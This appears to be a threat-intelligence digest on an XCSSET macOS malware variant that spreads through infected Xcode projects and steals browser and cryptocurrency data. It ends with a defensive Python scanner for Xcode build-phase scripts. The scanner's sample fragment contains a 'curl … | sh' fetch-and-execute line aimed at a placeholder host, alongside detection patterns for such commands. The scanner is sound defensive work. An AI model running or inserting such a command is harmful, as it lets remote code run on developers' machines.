XCSSET macOS malware variant targets Xcode developers with enhanced persistence and cryptocurrency theft
Summary
A new variant of the XCSSET macOS malware targets Xcode developers with enhanced browser targeting, clipboard hijacking, and improved persistence mechanisms. The malware spreads by infecting Xcode projects and steals cryptocurrency and browser data. It has so far been observed only in limited attacks. Microsoft has identified several new features in the latest XCSSET variant, including the ability to steal Firefox browser data, hijack cryptocurrency transactions, and employ new persistence methods. The malware compromises Xcode projects, which are commonly shared among developers, so that it propagates with them and executes during the build process.
Timeline
- 26.09.2025 01:49 · 1 article
New XCSSET macOS malware variant targets Xcode developers
A new variant of the XCSSET macOS malware has been detected, targeting Xcode developers with enhanced browser targeting, clipboard hijacking, and improved persistence mechanisms. The malware spreads by infecting Xcode projects and steals cryptocurrency and browser data. It has so far been observed only in limited attacks. The new variant includes the ability to steal Firefox browser data, hijack cryptocurrency transactions, and employ new persistence methods. Microsoft has shared findings with Apple and GitHub to mitigate the threat.
- Microsoft warns of new XCSSET macOS malware variant targeting Xcode devs — www.bleepingcomputer.com — 26.09.2025 01:49
Information Snippets
- XCSSET is a modular macOS malware that steals Notes, cryptocurrency wallets, and browser data.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
- The malware spreads by infecting Xcode projects and executes during the build process.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
- The new variant targets Firefox browser data using a modified HackBrowserData tool.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
- The malware includes a clipboard-hijacking component that replaces cryptocurrency addresses with attacker-controlled addresses.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
- New persistence methods include creating LaunchDaemon entries and a fake System Settings.app.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
- The malware has so far been observed only in limited attacks.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
- Microsoft has shared findings with Apple and GitHub to mitigate the threat.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
- Developers are advised to inspect Xcode projects before building, especially if shared by others.
  First reported: 26.09.2025 01:49 · 1 source, 1 article
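One way to act on the advice to inspect a shared Xcode project before building, as an added example that is not from Microsoft's report or the cited article: it lists every shell script build phase stored in the project's `project.pbxproj` so the scripts can be read before Xcode runs them. The sample fragment and the hint patterns are constructed for illustration and are not XCSSET indicators.

```python
import re
import sys

# Constructed sample of a project.pbxproj fragment (not from any real project).
SAMPLE = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA0000000000000000000001 /* SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			name = SwiftLint;
			shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
		};
		AA0000000000000000000002 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellScript = "curl -s https://example.invalid/x | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

SECTION = re.compile(r"/\* Begin PBXShellScriptBuildPhase section \*/(.*?)"
                     r"/\* End PBXShellScriptBuildPhase section \*/", re.S)
ENTRY = re.compile(r"(\w+) /\* (.*?) \*/ = \{(.*?)\n\s*\};", re.S)
SCRIPT = re.compile(r'shellScript = (?:"((?:[^"\\]|\\.)*)"|([^;\s]+));', re.S)
# Generic review hints chosen for this example; they are not XCSSET indicators.
HINTS = [("network fetch", re.compile(r"\b(?:curl|wget)\b")),
         ("decode or eval", re.compile(r"\b(?:base64|eval|osascript)\b")),
         ("pipe into shell", re.compile(r"\|\s*(?:ba|z)?sh\b"))]

def unescape(value):
    """Undo the backslash escapes used inside quoted pbxproj strings."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)),
                  value, flags=re.S)

def list_script_phases(pbxproj_text):
    """Return (phase name, script text, hints) for every shell script build phase."""
    phases = []
    for section in SECTION.findall(pbxproj_text):
        for _obj_id, name, body in ENTRY.findall(section):
            match = SCRIPT.search(body)
            if match is None:
                continue  # phase without a shellScript value
            raw = match.group(1) if match.group(1) is not None else match.group(2)
            script = unescape(raw)
            phases.append((name, script, [h for h, rx in HINTS if rx.search(script)]))
    return phases

if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE
    for name, script, hints in list_script_phases(text):
        print(f"== {name} {hints or ''}\n{script}")
```

Run it with the path to `project.pbxproj` inside the `.xcodeproj` bundle; an empty hint list does not clear a script, so every listed phase should still be read.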